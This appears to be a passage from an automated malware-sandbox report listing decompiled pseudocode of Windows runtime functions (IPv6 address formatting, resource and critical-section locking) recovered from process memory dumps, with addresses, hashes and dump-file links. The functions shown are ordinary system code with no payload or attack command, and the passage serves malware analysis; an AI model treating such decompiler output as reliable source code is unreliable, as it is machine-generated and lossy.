				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xc12088; // 0x776ba9e3
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00B67707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00B713CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00B67707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00B67707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00B32340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00B3E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                                0x00b714c0
                                                                                                                                                                0x00b714cb
                                                                                                                                                                0x00b714d2
                                                                                                                                                                0x00b714d6
                                                                                                                                                                0x00b714da
                                                                                                                                                                0x00b714de
                                                                                                                                                                0x00b714e3
                                                                                                                                                                0x00b7157a
                                                                                                                                                                0x00b7157a
                                                                                                                                                                0x00b714f1
                                                                                                                                                                0x00b714f3
                                                                                                                                                                0x00b9ea0f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ea15
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ea15
                                                                                                                                                                0x00b714f9
                                                                                                                                                                0x00b714f9
                                                                                                                                                                0x00b714fe
                                                                                                                                                                0x00b71504
                                                                                                                                                                0x00b9ea1a
                                                                                                                                                                0x00b9ea1f
                                                                                                                                                                0x00b9ea21
                                                                                                                                                                0x00b9ea22
                                                                                                                                                                0x00b9ea27
                                                                                                                                                                0x00b9ea2a
                                                                                                                                                                0x00b9ea2a
                                                                                                                                                                0x00b71515
                                                                                                                                                                0x00b71517
                                                                                                                                                                0x00b7156d
                                                                                                                                                                0x00b71572
                                                                                                                                                                0x00b71575
                                                                                                                                                                0x00b71575
                                                                                                                                                                0x00b7151e
                                                                                                                                                                0x00b9ea50
                                                                                                                                                                0x00b9ea55
                                                                                                                                                                0x00b9ea58
                                                                                                                                                                0x00b9ea58
                                                                                                                                                                0x00b7152e
                                                                                                                                                                0x00b71531
                                                                                                                                                                0x00b71533
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b71535
                                                                                                                                                                0x00b71541
                                                                                                                                                                0x00b71549
                                                                                                                                                                0x00b71549
                                                                                                                                                                0x00b71533
                                                                                                                                                                0x00b714f3
                                                                                                                                                                0x00b71559

                                                                                                                                                                APIs
                                                                                                                                                                • ___swprintf_l.LIBCMT ref: 00B9EA22
                                                                                                                                                                  • Part of subcall function 00B713CB: ___swprintf_l.LIBCMT ref: 00B7146B
                                                                                                                                                                  • Part of subcall function 00B713CB: ___swprintf_l.LIBCMT ref: 00B71490
                                                                                                                                                                • ___swprintf_l.LIBCMT ref: 00B7156D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                • Opcode ID: d134a558109be80996a229e046b2d3aae7137fe5eb0056055f4424a557a5677e
                                                                                                                                                                • Instruction ID: f50f206111d12d5753bd5c0f4fe5348be9bf51f17e1a5992f233d3664b7cf91c
                                                                                                                                                                • Opcode Fuzzy Hash: d134a558109be80996a229e046b2d3aae7137fe5eb0056055f4424a557a5677e
                                                                                                                                                                • Instruction Fuzzy Hash: C9218072900219ABCB20DE5CCC41AEA73ECEB60700F5485A5F86AE3140DB74EA588BF1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B553A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 45%
                                                                                                                                                                			E00B553A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00c101c0;
									_push(_t92);
									_push(0);
									_t37 = E00B2F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00B74FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00B83F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00B83F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00BB217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00B83F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00B73915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00B55384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00B2F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00B73915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00B2F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00B73915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00B2F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00B73915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00B55329(_t74, _t92);
													_push(1);
													_t48 = E00B553A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                                0x00b553ab
                                                                                                                                                                0x00b553ae
                                                                                                                                                                0x00b553b1
                                                                                                                                                                0x00b553b4
                                                                                                                                                                0x00b553b7
                                                                                                                                                                0x00b705b6
                                                                                                                                                                0x00b705c0
                                                                                                                                                                0x00b705c3
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b705c9
                                                                                                                                                                0x00b705c9
                                                                                                                                                                0x00b705cc
                                                                                                                                                                0x00b705d5
                                                                                                                                                                0x00b705d5
                                                                                                                                                                0x00b553bd
                                                                                                                                                                0x00b553bd
                                                                                                                                                                0x00b553bd
                                                                                                                                                                0x00b553be
                                                                                                                                                                0x00b553be
                                                                                                                                                                0x00b553be
                                                                                                                                                                0x00b553c0
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92269
                                                                                                                                                                0x00b9226d
                                                                                                                                                                0x00b92349
                                                                                                                                                                0x00b9234d
                                                                                                                                                                0x00b92273
                                                                                                                                                                0x00b92276
                                                                                                                                                                0x00b92279
                                                                                                                                                                0x00b9227e
                                                                                                                                                                0x00b92283
                                                                                                                                                                0x00b92287
                                                                                                                                                                0x00b9228a
                                                                                                                                                                0x00b9228d
                                                                                                                                                                0x00b9228f
                                                                                                                                                                0x00b922bc
                                                                                                                                                                0x00b922bc
                                                                                                                                                                0x00b922bc
                                                                                                                                                                0x00b922be
                                                                                                                                                                0x00b922c4
                                                                                                                                                                0x00b922cc
                                                                                                                                                                0x00b922d0
                                                                                                                                                                0x00b922d6
                                                                                                                                                                0x00b922d7
                                                                                                                                                                0x00b922da
                                                                                                                                                                0x00b922df
                                                                                                                                                                0x00b922e4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922e6
                                                                                                                                                                0x00b922e9
                                                                                                                                                                0x00b922f4
                                                                                                                                                                0x00b922f9
                                                                                                                                                                0x00b922fa
                                                                                                                                                                0x00b92305
                                                                                                                                                                0x00b92314
                                                                                                                                                                0x00b92319
                                                                                                                                                                0x00b9231a
                                                                                                                                                                0x00b9231d
                                                                                                                                                                0x00b92320
                                                                                                                                                                0x00b92323
                                                                                                                                                                0x00b92323
                                                                                                                                                                0x00b92328
                                                                                                                                                                0x00b9232d
                                                                                                                                                                0x00b9232f
                                                                                                                                                                0x00b92331
                                                                                                                                                                0x00b92336
                                                                                                                                                                0x00b92336
                                                                                                                                                                0x00b9233b
                                                                                                                                                                0x00b9233d
                                                                                                                                                                0x00b92350
                                                                                                                                                                0x00b92351
                                                                                                                                                                0x00b92356
                                                                                                                                                                0x00b92359
                                                                                                                                                                0x00b92359
                                                                                                                                                                0x00b9235b
                                                                                                                                                                0x00b9235d
                                                                                                                                                                0x00b55367
                                                                                                                                                                0x00b5536b
                                                                                                                                                                0x00b55372
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92363
                                                                                                                                                                0x00b92363
                                                                                                                                                                0x00b92369
                                                                                                                                                                0x00b9236a
                                                                                                                                                                0x00b9236c
                                                                                                                                                                0x00b92371
                                                                                                                                                                0x00b92373
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92379
                                                                                                                                                                0x00b92379
                                                                                                                                                                0x00b9237a
                                                                                                                                                                0x00b9237f
                                                                                                                                                                0x00b9237f
                                                                                                                                                                0x00b92385
                                                                                                                                                                0x00b92386
                                                                                                                                                                0x00b92389
                                                                                                                                                                0x00b9238e
                                                                                                                                                                0x00b92390
                                                                                                                                                                0x00b55378
                                                                                                                                                                0x00b5537c
                                                                                                                                                                0x00b92396
                                                                                                                                                                0x00b92396
                                                                                                                                                                0x00b92397
                                                                                                                                                                0x00b9239c
                                                                                                                                                                0x00b923a2
                                                                                                                                                                0x00b923a3
                                                                                                                                                                0x00b923a6
                                                                                                                                                                0x00b923ab
                                                                                                                                                                0x00b923ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b923b3
                                                                                                                                                                0x00b923b3
                                                                                                                                                                0x00b923b4
                                                                                                                                                                0x00b923b9
                                                                                                                                                                0x00b923ba
                                                                                                                                                                0x00b923ba
                                                                                                                                                                0x00b923bc
                                                                                                                                                                0x00b923bf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89153
                                                                                                                                                                0x00b89158
                                                                                                                                                                0x00b8915a
                                                                                                                                                                0x00b8915e
                                                                                                                                                                0x00b89160
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89166
                                                                                                                                                                0x00b89166
                                                                                                                                                                0x00b89171
                                                                                                                                                                0x00b89176
                                                                                                                                                                0x00b89176
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89160
                                                                                                                                                                0x00b923c6
                                                                                                                                                                0x00b923cb
                                                                                                                                                                0x00b923ce
                                                                                                                                                                0x00b923d7
                                                                                                                                                                0x00b923d7
                                                                                                                                                                0x00b923ad
                                                                                                                                                                0x00b92390
                                                                                                                                                                0x00b92373
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00b92291
                                                                                                                                                                0x00b92291
                                                                                                                                                                0x00b92293
                                                                                                                                                                0x00b92295
                                                                                                                                                                0x00b9229a
                                                                                                                                                                0x00b922a1
                                                                                                                                                                0x00b922a3
                                                                                                                                                                0x00b922a7
                                                                                                                                                                0x00b922a9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922ab
                                                                                                                                                                0x00b922ad
                                                                                                                                                                0x00b922af
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922af
                                                                                                                                                                0x00b922b1
                                                                                                                                                                0x00b922b4
                                                                                                                                                                0x00b922b4
                                                                                                                                                                0x00b922b6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922b6
                                                                                                                                                                0x00b9228f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9226d
                                                                                                                                                                0x00b553cb
                                                                                                                                                                0x00b553ce
                                                                                                                                                                0x00b553d0
                                                                                                                                                                0x00b553d4
                                                                                                                                                                0x00b553d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b553d8
                                                                                                                                                                0x00b553e3
                                                                                                                                                                0x00b553ea
                                                                                                                                                                0x00b553ea
                                                                                                                                                                0x00b553d6
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B922F4
                                                                                                                                                                Strings
                                                                                                                                                                • RTL: Resource at %p, xrefs: 00B9230B
                                                                                                                                                                • RTL: Re-Waiting, xrefs: 00B92328
                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B922FC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                • API String ID: 885266447-871070163
                                                                                                                                                                • Opcode ID: 066cdce67800b17ee6aabbafb47c9d67f9211febfb7ef954f91275a957978668
                                                                                                                                                                • Instruction ID: cb6a7519b223063190f78162ec70ba0143917dc8357f63493b58a499a638d457
                                                                                                                                                                • Opcode Fuzzy Hash: 066cdce67800b17ee6aabbafb47c9d67f9211febfb7ef954f91275a957978668
                                                                                                                                                                • Instruction Fuzzy Hash: 83513771A006017BDF209B28CC91FA673E8EF54761F2042E9FE1DDB281EA60ED4587A4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B5EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                			E00B5EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00B4DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xc1793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00B316C0(_t39);
				} else {
					_t40 = E00B2F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00B73915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00B301A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xc1793c; // 0x0
								_push(_t85);
								_t44 = E00B31F28(_t71);
							} else {
								_t44 = E00B2F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00B73915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00BB2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00B5EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00B74FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00B83F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00B83F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xc120c0;
								if(_t85 != 0xc120c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00BB217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00B83F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                                0x00b5ec56
                                                                                                                                                                0x00b5ec56
                                                                                                                                                                0x00b5ec56
                                                                                                                                                                0x00b5ec5c
                                                                                                                                                                0x00b5ec64
                                                                                                                                                                0x00b923e6
                                                                                                                                                                0x00b923eb
                                                                                                                                                                0x00b923eb
                                                                                                                                                                0x00b5ec6a
                                                                                                                                                                0x00b5ec6c
                                                                                                                                                                0x00b5ec6f
                                                                                                                                                                0x00b923f3
                                                                                                                                                                0x00b923f8
                                                                                                                                                                0x00b923fa
                                                                                                                                                                0x00b923fc
                                                                                                                                                                0x00b5ec75
                                                                                                                                                                0x00b5ec76
                                                                                                                                                                0x00b5ec76
                                                                                                                                                                0x00b5ec7b
                                                                                                                                                                0x00b5ec7c
                                                                                                                                                                0x00b5ec7e
                                                                                                                                                                0x00b92406
                                                                                                                                                                0x00b92407
                                                                                                                                                                0x00b9240c
                                                                                                                                                                0x00b9240d
                                                                                                                                                                0x00b9240d
                                                                                                                                                                0x00b9240d
                                                                                                                                                                0x00b92414
                                                                                                                                                                0x00b92417
                                                                                                                                                                0x00b9241e
                                                                                                                                                                0x00b92435
                                                                                                                                                                0x00b92438
                                                                                                                                                                0x00b9243c
                                                                                                                                                                0x00b9243f
                                                                                                                                                                0x00b92442
                                                                                                                                                                0x00b92443
                                                                                                                                                                0x00b92446
                                                                                                                                                                0x00b92449
                                                                                                                                                                0x00b92453
                                                                                                                                                                0x00b92455
                                                                                                                                                                0x00b9245b
                                                                                                                                                                0x00b9245b
                                                                                                                                                                0x00b5eb99
                                                                                                                                                                0x00b5eb99
                                                                                                                                                                0x00b5eb9c
                                                                                                                                                                0x00b5eb9d
                                                                                                                                                                0x00b5eb9f
                                                                                                                                                                0x00b5eba2
                                                                                                                                                                0x00b92465
                                                                                                                                                                0x00b9246b
                                                                                                                                                                0x00b9246d
                                                                                                                                                                0x00b5eba8
                                                                                                                                                                0x00b5eba9
                                                                                                                                                                0x00b5eba9
                                                                                                                                                                0x00b5ebae
                                                                                                                                                                0x00b5ebb3
                                                                                                                                                                0x00b5ebb9
                                                                                                                                                                0x00b5ebbb
                                                                                                                                                                0x00b92513
                                                                                                                                                                0x00b92514
                                                                                                                                                                0x00b92519
                                                                                                                                                                0x00b9251b
                                                                                                                                                                0x00b5ec2a
                                                                                                                                                                0x00b5ec2d
                                                                                                                                                                0x00b5ec33
                                                                                                                                                                0x00b5ec36
                                                                                                                                                                0x00b5ec3a
                                                                                                                                                                0x00b5ec3e
                                                                                                                                                                0x00b5ec40
                                                                                                                                                                0x00b5ec47
                                                                                                                                                                0x00b5ec47
                                                                                                                                                                0x00b5ec40
                                                                                                                                                                0x00b322c6
                                                                                                                                                                0x00b5ebc1
                                                                                                                                                                0x00b5ebc1
                                                                                                                                                                0x00b5ebc5
                                                                                                                                                                0x00b5ec9a
                                                                                                                                                                0x00b5ec9a
                                                                                                                                                                0x00b5ebd6
                                                                                                                                                                0x00b5ebd6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b5ebbb
                                                                                                                                                                0x00b92477
                                                                                                                                                                0x00b9247c
                                                                                                                                                                0x00b92486
                                                                                                                                                                0x00b9248b
                                                                                                                                                                0x00b92496
                                                                                                                                                                0x00b9249b
                                                                                                                                                                0x00b9249d
                                                                                                                                                                0x00b924a0
                                                                                                                                                                0x00b924a3
                                                                                                                                                                0x00b924aa
                                                                                                                                                                0x00b924aa
                                                                                                                                                                0x00b924a5
                                                                                                                                                                0x00b924a5
                                                                                                                                                                0x00b924a5
                                                                                                                                                                0x00b924ac
                                                                                                                                                                0x00b924af
                                                                                                                                                                0x00b924b0
                                                                                                                                                                0x00b924b3
                                                                                                                                                                0x00b924b9
                                                                                                                                                                0x00b924ba
                                                                                                                                                                0x00b924bb
                                                                                                                                                                0x00b924c6
                                                                                                                                                                0x00b924cb
                                                                                                                                                                0x00b924cd
                                                                                                                                                                0x00b924d0
                                                                                                                                                                0x00b924d1
                                                                                                                                                                0x00b924d4
                                                                                                                                                                0x00b924d6
                                                                                                                                                                0x00b924d9
                                                                                                                                                                0x00b924d9
                                                                                                                                                                0x00b924dc
                                                                                                                                                                0x00b924df
                                                                                                                                                                0x00b924e1
                                                                                                                                                                0x00b924e7
                                                                                                                                                                0x00b924e9
                                                                                                                                                                0x00b924ec
                                                                                                                                                                0x00b924ef
                                                                                                                                                                0x00b924f2
                                                                                                                                                                0x00b924f2
                                                                                                                                                                0x00b924ef
                                                                                                                                                                0x00b924e7
                                                                                                                                                                0x00b924fa
                                                                                                                                                                0x00b924ff
                                                                                                                                                                0x00b92501
                                                                                                                                                                0x00b92503
                                                                                                                                                                0x00b92506
                                                                                                                                                                0x00b9250b
                                                                                                                                                                0x00b5eb8c
                                                                                                                                                                0x00b5eb93
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b5eb93
                                                                                                                                                                0x00000000
